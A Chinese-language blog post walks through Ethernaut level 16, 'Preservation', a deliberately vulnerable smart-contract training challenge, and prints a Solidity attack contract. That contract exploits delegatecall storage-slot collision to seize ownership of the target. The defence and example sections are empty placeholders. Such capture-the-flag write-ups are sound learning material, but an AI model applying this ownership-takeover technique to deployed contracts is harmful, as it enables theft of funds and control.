# 智能合约黑客攻击 Ethernaut:  
 16. Preservation

By [Leek DEV](https://paragraph.com/@leekdev) · 2023-09-28

---

[Ethernaut](https://ethernaut.openzeppelin.com/) 是一个由 [OpenZeppelin](https://www.openzeppelin.com/) 基于 Solidity 编程语言开发的对抗游戏，每个关卡都有需要被 Hack 的智能合约。

教程
--

*   GitHub - [攻击代码](https://github.com/6boris)
    
*   Bilibili - [视频教程](https://space.bilibili.com/3493272831920239)
    
*   YouTube - [视频教程](https://www.youtube.com/@LeekDEV)
    
*   TikTok - ….
    

题目
--

获取合约owner权限

Hack思路
------

Preservation 有委托调用到其他合约，可以在其他合约里做手脚。

    interface IPreservation {
        function setFirstTime(uint256) external;
    }
    
    contract PreservationHack {
        // 和攻击合约声明相同的变量
        address public timeZone1Library;
        address public timeZone2Library;
        address public owner;
        uint256 storedTime;
    
        IPreservation public exploitInst;
    
        constructor(address _target) {
            exploitInst = IPreservation(_target);
        }
    
        function setTime(uint256 _addr) external {
            owner = address(uint160(_addr));
        }
    
        function attack() external {
            exploitInst.setFirstTime(uint256(uint160(address(this))));
            exploitInst.setFirstTime(uint256(uint160(msg.sender)));
        }
    }
    

Hack案例
------

…

防范思路
----

…

参考资料
----

….

---

*Originally published on [Leek DEV](https://paragraph.com/@leekdev/ethernaut-16-preservation)*